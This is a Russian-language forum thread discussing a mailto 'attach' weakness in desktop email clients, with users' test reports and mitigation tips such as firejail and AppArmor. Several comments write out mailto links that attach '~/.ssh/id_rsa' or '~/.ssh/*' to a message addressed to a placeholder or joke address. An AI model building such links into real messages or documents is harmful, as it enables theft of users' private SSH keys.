| 1.1, jfdbngh (?), 14:41, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +14 +/– |
Если каждый китаец наберет случайную строку на клавиатуре, то с 99% вероятностью получится эксплоит.
| | |
| 1.3, Аноним (3), 14:46, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– | |
>Пять из двадцати рассмотренных почтовых клиентов
Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.
| | |
| |
| |
| 3.21, Аноним84701 (ok), 15:25, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
 > outlook
> R4: Certificates are automatically imported, thereby replacing old ones
> что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.
Так себе "альтернатива".
| | |
|
| 2.20, Аноним84701 (ok), 15:23, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
>>Пять из двадцати рассмотренных почтовых клиентов
> Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.
Claws-то чем провинился?
> O2: Drafts are saved unencrypted even though encryption is enabled
> E1: The attach parameter of mailto URIs is not supported.
> | | |
| |
| 3.59, Аноним (59), 20:35, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
> The attach parameter of mailto URIs is not supported.
Как это not supported? Только что проверил: приаттачивает, но выводит об этом сообщение, которое невозможно не заметить. Ключик ssh аттачить отказался, мол potential private data leak.
| | |
| |
| 4.89, Аноним84701 (ok), 12:03, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
>> The attach parameter of mailto URIs is not supported.
> Как это not supported? Только что проверил: приаттачивает, но выводит об этом
> сообщение, которое невозможно не заметить.
У меня только сообщение "File doesn't exist or permission denied!". Даже если прописать в ссылке "/home/anon/существующий_файл".
| | |
|
|
| |
| 3.33, Siborgium (ok), 17:18, 19/08/2020 [^] [^^] [^^^] [ответить]
| –2 +/– |
 Тормозное и глючное Goвно. Зря Drew DeVault изменил сишке, авось лучше бы получилось. Пользовался примерно неделю, вообще не понравилось. (neo)mutt, и тот лучше.
| | |
|
| 2.68, Ilya Indigo (ok), 22:44, 19/08/2020 [^] [^^] [^^^] [ответить]
| –1 +/– |
 Trojita к этому не уязвима, только что проверил!
А как на меня тут https://www.opennet.me/openforum/vsluhforumID3/121309.html#17 косо смотрели...
Вход шли минусы и такие хипстерские выражения, как "минимальное чувство прекрасного" XD.
А оказалось это самый дырявый почтовый клиент. причём многие пользователи используют именно старую, однопотчную менее прожорливую версию. Вот так вот!
| | |
| |
| 3.79, Атон (?), 10:09, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
Эк тебя задело..
Один только _одинаковый_ интерфейс пользователя на линуксе и виндовсе, примиряет с "прожорливостью".
Еще Thunderbird используют для совместимости.
Один профиль, простой и понятный, легко переносимый на флешке для линукса и виндовса.
В других почтовых клиентах дырявость еще не обнародовали а какая то там мнимая поточность вообще никого не волнует, кроме отмороженых хипстеров.
| | |
|
|
| |
| |
| |
| 4.7, Ag (ok), 14:56, 19/08/2020 [^] [^^] [^^^] [ответить]
| +13 +/– |
 На значит на этой машине не повезло, ждем-с другую. Интернет-с - он большой.
| | |
| |
| 5.9, Аноним (4), 14:59, 19/08/2020 [^] [^^] [^^^] [ответить]
| –4 +/– |
Так это глупо - отвечать на письма от незнакомых адресатов. Их в спам помещают или игнорируют.
| | |
| |
| 6.53, Аноним (53), 20:07, 19/08/2020 [^] [^^] [^^^] [ответить]
| +4 +/– |
Почему сразу "не знакомых"? А может знакомых. Может это какой-то магазин офигительных товаров и скидок куда пользователь пишет письмо т.к. на сайте написано "напишите нам и мы отправим вам товар". Пользователь пишет, ему в ответ приходит "ваш товар готов к отправке, вам удобно получить товар на этой или на следующей неделе" и вот в этом письме mailto.
Почему все думают что самые умные?
| | |
|
| 5.12, Аноним (4), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Thunderbird позволяет прикреплять группы файлов
И глупо отправлять послание, не взглянув на окошко со списком вложений.
Так что проблема скорее не реализации и не протокола даже, а опять социальная.
| | |
| |
| 6.78, Атон (?), 09:59, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
Люди в это окошко не заглядывают даже когда сами добавили или должны были добавить аттач.
Конечно социальная инженерия. Бьет в цель наверняка.
| | |
|
|
|
| |
| 4.11, Иваня (?), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]
| –2 +/– |
~$ cat ~/.ssh/id_rsa
cat: /home/Иваня/.ssh/id_rsa: No such file or directory
~$ cd ~/.ssh/id_rsa
bash: cd: /home/Иваня/.ssh/id_rsa: No such file or directory
| | |
| |
| 5.27, ss (??), 16:11, 19/08/2020 [^] [^^] [^^^] [ответить]
| +3 +/– |
Вы просто не участвуете соревновании. Спокойно игнорируйте :)
| | |
|
| |
| 5.80, Атон (?), 10:14, 20/08/2020 [^] [^^] [^^^] [ответить]
| –1 +/– |
Поподробнее пожалуйста расскажите [a href=mailto:?to=fsb@nsa.gov&subject="Докладываю про нормальных пользователей подробнее"&body="Позвольте приложить список нормальных пользователей "&attach=~/.ssh/*]про нормальных пользователей[/a]. Очень интересно
| | |
|
|
|
|
| |
| 2.34, Siborgium (ok), 17:29, 19/08/2020 [^] [^^] [^^^] [ответить]
| –2 +/– |
OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
| | |
| |
| 3.38, Michael Shigorin (ok), 18:31, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
 Вас никто не заставляет ключи openssh держать в файлах с предсказуемыми именами (да и путями тоже). Это превратит почти неинтерактивную атаку с одним-единственным элементом социнжиниринга ("лишь бы не заметил список приложений") в как минимум двухстадийную целенаправленную при необходимости её успеха -- сперва надо выкрасть ~/.ssh/config и посмотреть IdentityFile.
| | |
| |
| 4.90, ALex_hha (ok), 13:00, 20/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
 а шифрование приватого ключа - вообще делает такие атаки бессмысленными, от слова совсем
| | |
|
| 3.40, Аноним84701 (ok), 18:49, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
Классическое решение:
запускать браузер от другого пользователя (например, <name>surfer), у которого доступ в "основной" ~ есть только в ~/downloads
| | |
| |
| 4.96, Аноним (96), 22:32, 20/08/2020 [^] [^^] [^^^] [ответить]
| –1 +/– |
ага. типичный линуксокостыль - на каждый пук заводить по пользователю. зачёт. ещё и группу можно.
| | |
|
|
|
| 1.17, тоже Аноним (ok), 15:14, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +4 +/– |
 Создал файл со ссылкой
mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa
Щелкнул. Открылся Thunderbird, подставил Title и Text... и не прикрепил никаких вложений, хотя такой файл есть.
Версия 68.10 - по информации в статье, "уязвимая".
| | |
| |
| 2.25, ss (??), 15:54, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
Может чтобы оно сработало надо плагин поставить?
| | |
| |
| 3.29, тоже Аноним (ok), 16:21, 19/08/2020 [^] [^^] [^^^] [ответить]
| +2 +/– | |
> Может чтобы оно сработало надо плагин поставить?
Ага, предварительно скомпилировав.
| | |
| |
| 4.30, ss (??), 16:22, 19/08/2020 [^] [^^] [^^^] [ответить]
| –1 +/– |
Предварительно пропатчив авторскими фиксами после посылки багрепорта...
| | |
| |
| 5.36, Аноним (36), 17:52, 19/08/2020 [^] [^^] [^^^] [ответить]
| +7 +/– |
Да ну нфиг слишком сложно пишите просто сразу куда слать этот ~/.ssh/id_rsa файл?
| | |
| |
| 6.108, rvs2016 (ok), 22:17, 23/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
 > Да ну нфиг слишком сложно пишите просто сразу
> куда слать этот ~/.ssh/id_rsa файл?
Это всё-равно сложно.
Пишите лусша сразу куда слать ДЕНЬГИ :-)))
| | |
|
|
|
|
| 2.32, Аноним (32), 16:52, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
Мои эксперименты с kmail дали такой результат: оно действительно пытается приложить файл, но это всегда заканчивается ошибкой "файл не существует". Хотя я проверял на тех файлах, что 100% существуют и доступны.
При этом, в окне редактирования письма горит огромная красная надпись, что вложения были добавлены внешней программой, и нужно их проверить.
| | |
| |
| 3.37, sergey (??), 18:03, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
| | |
| |
| 4.41, тоже Аноним (ok), 19:25, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
 > Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.
| | |
| |
| |
| 6.49, тоже Аноним (ok), 19:53, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> /root/.ssh/id_rsa
Во-первых, это не мой. Во-вторых,
$ cat /root/.ssh/id_rsa
cat: /root/.ssh/id_rsa: Permission denied
| | |
|
| 5.52, Аноним (52), 20:06, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
>Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.
Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.
| | |
| |
| 6.57, тоже Аноним (ok), 20:18, 19/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.
Ну, это же так несложно. Достаточно поправить данную мной выше ссылку прямо в браузере, щелкнуть... и убедиться, что оно таки по-прежнему не работает.
Хотя pwdx 'pgrep thunderbird' таки показывает домашнюю папку текущего пользователя.
| | |
|
| 5.99, OpenEcho (?), 02:07, 21/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
> Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.
$HOME/.ssh/id_rsa
| | |
| |
| 6.100, тоже Аноним (ok), 13:32, 21/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
> $HOME/.ssh/id_rsa
Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?
| | |
| |
| 7.101, OpenEcho (?), 16:37, 21/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
>> $HOME/.ssh/id_rsa
> Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?
Приехали...
Тильда ~ это не есть функция файловой системы. Это алиас шела, который банально прется в среду и извлекает содержимое НОМЕ, которое в свое время заполняется функцией getpwent() вытаскивя из /etc/passwd домашнюю директорию.
Зайдите в шел, сделайте следующее: export HOME=/etc; cd ~; pwd
и пугайтесь сами :)
Know your tool: http://www.gnu.org/software/bash/manual/html_node/Tilde-Expansion.html
| | |
|
|
|
|
| 3.42, Bdfybec (?), 19:32, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
> вложения были добавлены внешней программой
Что за внешняя программа?
| | |
| |
| 4.54, Sluggard (ok), 20:08, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
 Видимо, подразумевается программа, в которой открывалась ссылка «mailto:» — она ведь передала параметр «attach».
| | |
|
|
| 2.63, Аноним (63), 21:24, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
Mailspring (snap):
?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa could not be found, or has invalid file permissions.
Файл есть, а доступа нет. Я ничего не менял специально. К любым другим тоже не доступа у него.
| | |
|
| |
| |
| |
| 4.67, Аноним (59), 22:38, 19/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
И что, им теперь надо научиться разбирать URL для всех схем со всеми возможными параметрами и начать подменять их?
| | |
|
|
|
| |
| 2.95, PnD (??), 22:30, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
А он есть©
Но лучше посмотреть на стр.5 PDF т.к. в новости легенду забыли.
"Нет, не был, не состоял".
| | |
|
| |
| 2.47, kusb (?), 19:50, 19/08/2020 [^] [^^] [^^^] [ответить]
| +3 +/– |
Почему дыра? Это часть стандарта?
Получается, что это заявленная возможность, так?
| | |
|
| 1.45, Аноним (45), 19:39, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– | |
>специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:<
вот это неприятно
| | |
| 1.46, kusb (?), 19:47, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ] | –3 +/– | Для того, чтобы отправить файл на наш сервис переименуйте его в send txt и распо... большой текст свёрнут, показать | | |
| 1.55, timur.davletshin (ok), 20:08, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
 Стандартный Evolution из Debian stable прикрепляет и выводит в шапке письма предупреждение о том, что файл из скрытого каталога и может содержать приватную информацию. Т.е. сказать, что совсем об этом никто никогда не думал, нельзя.
| | |
| |
| |
| 3.64, timur.davletshin (ok), 21:30, 19/08/2020 [^] [^^] [^^^] [ответить]
| +2 +/– |
А так и было задумано... Вообще, я не вижу ничего критичного в таком поведении. Кнопку "Send" за меня оно не нажимает и ладно. Если пользователь настолько олень, что не смотрит, что отправляет, то это его личные проблемы.
| | |
| |
| 4.81, kusb (?), 10:41, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
Вот я не согласен, дело в том, что я не слишком ожидаю отправки файла почтовиком из моей файловой системы. Я скорее не хочу быть постоянно напряжённым работая с компьютером проверяя то, что предлагаемые функции не делают плохие вещи.
Так можно и в диалоге удаления файлов регулярку "*" по умолчанию подставлять, и запуск произвольной команды в стандарт mailto засунуть вместе с получением в аттаче файлов, которые вернёт эта команда и в веб-формы аналогичное поведение включить.
Это просто не слишком ожидается, как по мне. Я вероятно не слишком ожидаю, что плеер не будет трактовать открытие исполняемого файла как его запуск и не проверяю перед открытием видео или что программа выставит уже существующее имя файла в диалоге сохранения и молча перезапишет его, или при установке перезапишет биос на кривую версию, или Синаптик в диалоге установки программы реализует действие по умолчанию "установить Яндекс Бар".
Есть программа и то, что она делает. И есть то, над чем ты можешь не думать, потому что это не кажется её функциональностью. Если это почтовый клиент, то кому-то лучше думать о почте, или нет... а не о том, что она может отправить файл из файловой системы. Пусть даже она может, но ожидаемо ли это или нет?
| | |
| |
| 5.83, kusb (?), 10:48, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
Ну ладно, может иногда и проверяю и в этом есть часть вранья. Про имя файла по умолчанию так вообще не уверен даже.
| | |
| 5.87, timur.davletshin (ok), 11:20, 20/08/2020 [^] [^^] [^^^] [ответить]
| –1 +/– |
Берёшь apparmor профиль private-files-strict и запиливаешь его в качестве основы для своего любимого почтовика. Например, именно на его основе стоковый модуль для Evince режет доступ к каталогам gnupg, ssh, почты и чего-то, что я уже не помню.
| | |
|
|
|
|
| 1.62, Аноним (62), 21:03, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Спалил контору =(((( ну по крайне мере последние лет 5 это стабильно работало. и да Хелло html2pdf, dompdf и рукожопы 97% ;)
| | |
| |
| 2.85, Нечего (?), 11:11, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
Что если эволютион отправить в дев нуль что бы он не смог работать на мне , давно замечаю эту блоатварь которую не вызывал гуляющей по диспетчеру задач , ну ладно крон итд , а эта то гуляет зачем ? Я уж думаю линукс особенно убунточка исправится хотя бы на нашей территории если директором этого филиала буду я , а не яндекс который прибежал уже после.
| | |
|
| 1.69, Kuromi (ok), 23:25, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| –2 +/– |
 *Facepalm*
А мне всегда казалочь что ну такие тривиальные дыры давно прикрыты. Наверное всем так казалось, поэтому никто их и не озаботился прикрыть.
С другой стороны, ссылок mailto вживую я лично не видел уже давно. Сейчас уже и почта-то - просто старомодной как-то.
| | |
| |
| 2.70, Аноним (70), 00:44, 20/08/2020 [^] [^^] [^^^] [ответить]
| +5 +/– |
 Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые ящики? Просто интересно
| | |
| |
| 3.94, Kuromi (ok), 21:41, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
> Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые
> ящики? Просто интересно
Смотря для чего - личное общение - разные IM, рабочее - Слаки и тому подобное. Пресловутые списки рассылки были вытеснены багзилламии гитхабами.
Впрочем, я не считаю что от емейла надо отказываться, но то что мир не стоит на месте - это точно.
| | |
|
| 2.82, iPony129412 (?), 10:44, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– | |
> уже и почта-то - просто старомодной как-то
Нет.
Другое дело, что есть куча почтовых технологий устаревших, которые надо выкидывать
| | |
|
| 1.72, Аноним (72), 03:33, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А поясните, пользователь сам потом отсылает письмо? Не автоматически же отсылается через mailto.
| | |
| |
| 2.73, Аноним (73), 05:44, 20/08/2020 [^] [^^] [^^^] [ответить]
| +1 +/– |
Да, поэтому там указано, что "пользователь может не заметить". То есть, может и заметить, а если бы уходило автоматически, то замечание не имело бы смысла.
| | |
|
| 1.86, Аноним (86), 11:17, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
firejail "Ваш любимый почтовый клиент"
Со списком для firejail куда клиенту можно ходить.
| | |
| 1.88, ИмяХ (?), 11:57, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
У кухоных ножей есть опасная уязвимость - если злоумышленник ударит им человека, то человек получит серьёзную травму и даже может умереть. Почему производители ножей не устраняют эту уязвимость? Существующие сейчас правила безопасности - это лишь набор костылей, которые не дают должной защиты. Ведь любой может идти по улице и не заметить подкравшегося сзади злоумышленника.
| | |
| |
| 2.93, Firecat (ok), 18:23, 20/08/2020 [^] [^^] [^^^] [ответить]
| +/– |
 Вообще-то кухонный нож плох для таких целей, у него очень слабая проникающая способность по сравнению с боевыми и охотничьими ножами... Короче, уязвимость устранена до максимума возможного.
| | |
|
| 1.92, Firecat (ok), 18:13, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| –2 +/– |
Короче, безопасные клиенты;
Windows: W10 Mail, The Bat!
Linux: Trojitá, Mutt
macOS: Airmail
iOS: Mail App
Android: K-9 Mail, MailDroid
| | |
| 1.98, economist (?), 23:39, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– | |
Щелкая по email - юзер хочет слать письмо, и должен быть уже настороже.
О том что вложились файлы - должно быть хорошо заметно в интерфейсе.
А что это секретные файлы - скажет расширение (в Thunderbird).
В нем же расширения говорят что получатель - из другого домена.
Наверно автоматом вкладывать файлы - не лучшая идея для протокола на обычный клик, но каких-то серьезных утечек - скорее всего не было.
| | |
|
